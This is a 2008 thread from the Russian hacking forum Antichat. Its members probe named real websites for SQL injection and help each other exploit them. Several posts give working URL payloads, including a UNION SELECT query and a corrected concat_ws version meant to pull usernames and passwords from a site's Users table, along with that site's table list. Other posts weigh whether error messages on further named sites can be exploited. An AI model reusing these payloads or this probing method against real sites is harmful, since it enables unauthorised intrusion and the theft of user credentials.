ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2461  
Старый 24.06.2008, 12:11
Аватар для Ershik
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Значит, что либо сделать невозможно.
http://www.goteborg.com/default.aspx?id=-1' - Здесь аналогично?
Цитата:
Page -1 was not found
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: EPiServer.Core.PageNotFoundException: Page -1 was not found

Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.


Stack Trace:

[PageNotFoundException: Page -1 was not found]
EPiServer.DataAccess.PageLoadDB.Load(PageReference pageLink) +698
EPiServer.DataFactory.ᐂ(PageReference ) +50
EPiServer.DataFactory.GetPage(PageReference pageLink, AccessLevel access) +496
EPiServer.PageBase.GetPage(PageReference pageLink) +171
EPiServer.SimplePage.get_CurrentPage() +177
EPiServer.EditPage.get_CurrentPage() +218
EPiServer.UserControlBase.get_CurrentPage() +21
Goteborg.templates.Units.TopMenu.InitDropDown() +15
Goteborg.templates.Units.TopMenu.OnInit(EventArgs e) +58
System.Web.UI.Control.InitRecursive(Control namingContainer) +240
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Page.ProcessRequestMain() +197
 
Ответить с цитированием

  #2462  
Старый 24.06.2008, 12:23
Аватар для z3r0cool
z3r0cool
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918

Репутация: 56
Отправить сообщение для z3r0cool с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ershik  
Значит, что либо сделать невозможно.
http://www.goteborg.com/default.aspx?id=-1' - Здесь аналогично?
Да, вообще там используется System.Number.ParseInt32.
 
Ответить с цитированием

  #2463  
Старый 24.06.2008, 17:20
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Цитата:
Сообщение от gisTy  
надо смотреть по обстоятельствам...
Мде... чёт я не подумал).Всё равно попробую)
 
Ответить с цитированием

  #2464  
Старый 25.06.2008, 12:27
Аватар для Мистерео
Мистерео
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830

Репутация: 94
По умолчанию

Вот у меня несколько вопросов
Нашел сайт нашел все таблицы+ колонки вопрос как прочитать колонки в таблице если я делаю запрос типу
Код:
http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,3,id,username,password,7,8,9,10,11,12,13,14+FROM+Users+LIMIT+1,1/*
В таблице Users имеются следующие колонки
Код:
Users
--id,username,password,email
Возможно я чтото делаю не так или нужно шифровать? (пробовал в HEX шифровать кое где и не получилось)
в придачу даю список всех таблиц
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
Blog
Cats
Comment
My_places
Portfolio
Snippet
Snippet_cat
Snippet_language
Tags
Testimonials
Top_cat
Top_rated
User
Users
 
Ответить с цитированием

  #2465  
Старый 25.06.2008, 12:40
Аватар для 159932
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,concat_ws(0x3a,us ername,password),3,4,5,7,8,9,0,1,2,3,4+from+users/*
лови .. и думай ..
 
Ответить с цитированием

  #2466  
Старый 25.06.2008, 19:17
Аватар для Ershik
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

http://www.pemshop.com/detail.aspx?ID=1%20or%201=(select%20system_user)-- - с этим можно что нибудь сделать?
Аналогичный прошлый вопрос.
 
Ответить с цитированием

  #2467  
Старый 25.06.2008, 19:28
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Ershik
Только расскрытие пути
 
Ответить с цитированием

  #2468  
Старый 25.06.2008, 19:31
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://mini-abo.eu/index.php?m=price&sstring=-1'&go=%CF%EE%E8%F1%EA


скуля...какие предложения по раскрутке?
 
Ответить с цитированием

  #2469  
Старый 25.06.2008, 19:46
Аватар для Ershik
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

К какому виду относится эта ошибка?
http://www.ncbi.ie/ncbi/shop/show_cart.php?new=74%27&save=747'
Цитата:
Warning: array_count_values() [function.array-count-values]: Can only count STRING and INTEGER values! in /u0/webroot/virtual/newsite.ncbi.managed.tibus.net/ncbi/shop/show_cart.php on line 81
 
Ответить с цитированием

  #2470  
Старый 25.06.2008, 21:08
Аватар для z3r0cool
z3r0cool
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918

Репутация: 56
Отправить сообщение для z3r0cool с помощью ICQ
По умолчанию

Цитата:
Сообщение от Gorev  
http://mini-abo.eu/index.php?m=price&sstring=-1'&go=%CF%EE%E8%F1%EA


скуля...какие предложения по раскрутке?
Никак видимо, проверка длины параметра sstring, максимальная длина = 12 символов : хотя и пропускает = (', /**/, спец символы);
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ